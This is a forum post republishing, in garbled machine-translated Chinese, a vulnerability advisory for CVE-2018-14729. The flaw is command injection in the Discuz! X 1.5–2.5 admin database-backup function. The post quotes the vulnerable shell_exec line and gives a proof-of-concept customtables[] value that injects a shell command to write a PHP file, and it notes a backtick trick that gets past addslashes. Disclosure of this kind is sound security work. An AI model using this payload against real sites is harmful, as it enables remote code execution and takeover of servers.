康盛创想! 1.5 - -2.5后台命令执行漏洞(cve - 2018 - 14729) [复制链接]
2112
0
康盛创想端getshell描述
额外的信息康盛创想- 1.5 - 2.0
数据库备份功能 源/ admincp / admincp_db。 php在康盛创想! 1.5到2.5 允许远程攻击者执行任意的PHP代码。
VulnerabilityType其他代码执行
供应商的产品腾讯
影响产品代码库康盛创想- 1.5 - 2.5
受影响的组件受影响的源代码文件
攻击类型远程
影响代码的执行真正的
攻击向量攻击者需要登录后台
供应商已确认或承认的弱点吗?真正的
发现者MitAh @ Chaitin科技
细节以DiscuzX2.5为例
源/ admincp / admincp_db.php
# line 296@shell_exec($mysqlbin.'mysqldump --force --quick '.($db->version() > '4.1' ? '--skip-opt --create-options' : '-all').' --add-drop-table'.($_GET['extendins'] == 1 ? ' --extended-insert' : '').''.($db->version() > '4.1' && $_GET['sqlcompat'] == 'MYSQL40' ? ' --compatible=mysql40' : '').' --host="'.$dbhost.($dbport ? (is_numeric($dbport) ? ' --port='.$dbport : ' --socket="'.$dbport.'"') : '').'" --user="'.$dbuser.'" --password="'.$dbpw.'" "'.$dbname.'" '.$tablesstr.' > '.$dumpfile);# line 281$tablesstr = '';foreach($tables as $table) { $tablesstr .= '"'.$table.'" ';}# line 143$tables = & $_GET['customtables'];我们可以很容易的控制参数$tablesstr在功能上shell_exec()执行代码。
POC改变customtables[] = pre_common_admincp_cmenu">aaa; echo '<?php phpinfo(); ?>' > phpinfo.php #
$tables = $_G['gp_customtables']
使用addslashes()为了逃避,但它仍然是通过“whoami”
康盛创想- 3.0 - 3.4开发人员写了一个错误,数据库备份功能不工作。 然而,vunl还在那里。
最新回复 (0)